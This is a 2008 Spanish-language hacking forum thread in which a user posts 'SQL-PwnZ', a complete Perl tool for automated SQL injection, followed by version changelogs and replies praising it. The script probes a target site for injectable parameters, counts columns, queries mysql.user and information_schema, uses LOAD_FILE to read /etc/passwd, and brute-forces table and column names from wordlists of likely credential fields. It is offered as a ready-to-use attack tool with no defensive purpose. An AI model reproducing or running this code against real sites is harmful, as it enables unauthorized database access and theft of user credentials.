Título: [+] SQL-PwnZ v1.1 | By Login-Root
Publicado por: Login-Root en 17 Julio 2008, 23:40 pm
Que les guste y que les sirva ;D #!/usr/bin/perl
########################################################################################### # -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]- ### ###########################################################################################
########################################################################################### # [+] inf0: ### ########################################################################################### # Busca: ### # ====== ### # - Nº de columnas ### # - Information_Schema && MySQL.User ### # - LOAD_FILE ### # - Tablas ### # - Columnas ### # ### # ...y guarda todo en un archivo de texto. ### # ### ###########################################################################################
########################################################################################### # [+] Use: ### ########################################################################################### # perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMENTARIO] [-T] [-C] [-NOCHECK] ### # [WEBSITE]: http://www.web.com/index.php?id= ### # [COLUMNS]: Limite de columnas ### # [FILE]: Archivo donde guardar web vulnerable ### # [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional) ### # [-T]: Intentar brutear tablas (Opcional) ### # [-C]: Intentar brutear columnas (Opcional) ### # [-NOCHECK]: No hacer el chequeo inicial (Opcional) ### ###########################################################################################
########################################################################################### # [+] c0ntact: ### ########################################################################################### # MSN: no.more@passport.com ### # Jabber: login-root@x23.eu ### # E-Mail: login_root@yahoo.com.ar ### ###########################################################################################
########################################################################################### # [+] sh0utz: ### ########################################################################################### # In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion ; N3xtdoor ### # Many thanks to boER, who teach me a little of perl ;D ### # VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM ### ###########################################################################################
use LWP::Simple;
if(!$ARGV[2]) { print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n========================================="; print "\n\nUso: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMENTARIO] [-T] [-C] [-NOCHECK]\n"; print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limite de columnas\n[FILE]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-T]: Intentar brutear tablas (Opcional)\n[-C]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n\n"; exit (0); } @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table', 'miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass', 'tAdmin','tadmin','user_password','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email', 'user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins', 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador', 'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena','auth','key','senha', 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization', 'membros','utilizadores','staff','nuke_authors','accounts','account','accnts', 'associated','accnt','customers','customer','membres','administrateur','utilisateur', 'tuser','tusers','utilisateurs','password','amministratore','god','God','authors', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members', 'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
if ( $ARGV[0] !~ /^http:/ ) { $ARGV[0] = "http://" . $ARGV[0]; }
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--") { $cmn.= "+"; $cfin.="--"; print "\n[+] Comentarios a utilizar: '--' & '+'"; } else { $cmn.= "/**/"; $cfin.= "/*"; print "\n[+] Comentarios a utilizar: '/*' & '/**/'"; }
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Imposible crear el archivo de texto\n"; if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK") { print "\n[!] Se omite el chequeo inicial...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "\n[!] Chequeando si la web es vulnerable...\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin; $response=get($sql)or die("[-] Direccion web ingresada erroneamente, favor de reingresar de nuevo\n"); if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/) { print "[+] Web vulnerable, continua el script...\n"; print WEB "[WEBSITE]:\n\n$ARGV[0]\n"; } else { print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario\n\n"; exit(1); } } print "\n[!] Buscando columnas...\n"; for ($column = 0 ; $column < $ARGV[1] ; $column ++) { $union.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 0) { print WEB "\n[COLUMNAS]:\n\n"; $inyection = ''; $union = ''; } $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin; $response=get($sql)or die("[-] Error al intentar encontrar el numero de columnas, chequear website\n"); if($response =~ /loginpwnz/) { $column ++; print "[+] La web posee $column columnas\n\n"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin; print "$sql\n"; print WEB "$sql\n"; print "\n[!] Chequeando si existe Information_Schema..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin; $response=get($sql)or die("[-] Imposible obtener Information_Schema\n"); if($response =~ /loginpwnz/) { print "\n[+] Information_Schema disponible...guardando en $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin; print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n"; } else { print "\n[-] Information_Schema no disponible"; } print "\n[!] Chequeando si existe MySQL.User..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin; $response=get($sql)or die("[-] Imposible obtener MySQL.User\n"); if($response =~ /loginpwnz/) { print "\n[+] MySQL.User disponible...guardando en $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin; print WEB "\n\n[MYSQL.USER]:\n\n$sql\n"; } else { print "\n[-] MySQL.User no disponible"; } while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764)'; $loadcont++; } print "\n[!] Chequeando si es posible inyectar LOAD_FILE..."; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n"); if($response =~ /root:x:0:0/) { print "\n[+] LOAD_FILE disponible...guardando en $ARGV[2]"; print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n"; } else { print "\n[-] LOAD_FILE no disponible"; } if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T") { print "\n\n[!] Bruteando tablas..."; print WEB "\n\n[TABLAS]:\n\n"; foreach $tabla(@nombretabla) { chomp($tabla); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Imposible obtener tablas\n"); if($response =~ /loginpwnz/) { print "\n[+] La tabla $tabla esta disponible...guardando en $ARGV[2]"; $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin; print WEB "$sql\n"; } } } if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C") { print "\n\n[!] Tabla a la cual brutear columnas: "; $tabla.=<STDIN>; chomp($tabla); print WEB "\n\n[COLUMNAS EN TABLA]: $tabla\n\n"; foreach $columna(@nombrecolumna) { chomp($columna); $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Imposible obtener columnas\n"); if ($response =~ /loginpwnz/) { print "\n[+] La columna $columna esta disponible...guardando en $ARGV[2]"; print WEB "$columna\n"; } } } print WEB "\n\n\n[*EOF*]"; print "\n\n[+] Todo salvado correctamente en $ARGV[2]\n\n"; print "## c0ded by Login-Root | 2008 ##\n\n"; exit (0); } } print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n"; print "## c0ded by Login-Root | 2008 ##\n\n"; exit (0); Ejemplo de uso:(http://img523.imageshack.us/img523/1276/asdxm3.png) Archivo de texto de salida:(http://img182.imageshack.us/img182/4941/07textls7.png) Comenten ;) Saludos.ACTUALIZACIÓN v0.7:- Analiza si LOAD_FILE esta disponible.
- Mejor codigo.
ACTUALIZACIÓN v0.8:- FiX LOAD_FILE (No funcionaba correctamente).
- FiX Columnas (En algunos casos no las encontraba bien).
ACTUALIZACIÓN v0.9:- Se puede elegir el comentario a utilizar ("/*" o "--").
- Alguna que otra cosa fixeada.
ACTUALIZACIÓN v1.0:- Mas nombres de tablas y de columnas agregadas.
- Mejor code.
- Mas bugs fixeados.
ACTUALIZACIÓN v1.1:- Añadida opcion para no hacer el chequeo inicial (Chequeo de web vulnerable) (-NOCHECK).
- Añadido chequeo por si te olvidaste el http:// :P.
- FiX Columnas cuando la web tenia 1 sola columna.
- Mas bugs fixeados.
Título: Re: [+] SQL-PwnZ v0.6
Publicado por: Azielito en 18 Julio 2008, 00:00 am
Esta muy interesante y ahorra mucho trabajo jahahaha
Hace tiempo tambien vi un script en perl para blind SQLinjection, pero tarda mucho mas tiempo jehehe
PD: felicidades, muy bueno el script :D
Título: Re: [+] SQL-PwnZ v0.7
Publicado por: Login-Root en 19 Julio 2008, 00:28 am
ACTUALIZACIÓN v0.7:- Analiza si LOAD_FILE esta disponible.
- Mejor codigo.
Título: Re: [+] SQL-PwnZ v0.8 | By Login-Root
Publicado por: Login-Root en 30 Julio 2008, 06:30 am
ACTUALIZACIÓN v0.8:- FiX LOAD_FILE (No funcionaba correctamente).
- FiX Columnas (En algunos casos no las encontraba bien).
Título: Re: [+] SQL-PwnZ v0.8 | By Login-Root
Publicado por: carlitos.dll en 30 Julio 2008, 06:49 am
Se ve muy bueno.
Título: Re: [+] SQL-PwnZ v0.8 | By Login-Root
Publicado por: Login-Root en 1 Agosto 2008, 02:52 am
Gracias! ;D
Título: Re: [+] SQL-PwnZ v0.9 | By Login-Root
Publicado por: Login-Root en 8 Agosto 2008, 04:08 am
ACTUALIZACIÓN v0.9:- Se puede elegir el comentario a utilizar ("/*" o "--").
- Alguna que otra cosa fixeada.
Título: Re: [+] SQL-PwnZ v0.9 | By Login-Root
Publicado por: Darvein en 8 Agosto 2008, 04:37 am
OMG o.0 muy bueno. Felicidades. Estoy aprendiendo ;)
Título: Re: [+] SQL-PwnZ v1.0 | By Login-Root
Publicado por: Login-Root en 18 Agosto 2008, 03:40 am
ACTUALIZACIÓN v1.0:- Mas nombres de tablas y de columnas agregadas.
- Mejor code.
- Mas bugs fixeados.
Título: Re: [+] SQL-PwnZ v1.1 | By Login-Root
Publicado por: Login-Root en 30 Agosto 2008, 04:03 am
ACTUALIZACIÓN v1.1:- Añadida opcion para no hacer el chequeo inicial (Chequeo de web vulnerable) (-NOCHECK).
- Añadido chequeo por si te olvidaste el http:// :P.
- FiX Columnas cuando la web tenia 1 sola columna.
- Mas bugs fixeados.
Título: Re: [+] SQL-PwnZ v1.1 | By Login-Root
Publicado por: Monaco en 18 Septiembre 2008, 22:36 pm
Gracias lo probe y va muy bien...
Ahorro muuuuuuuucho tiempo gracias a este script!
Saludos
|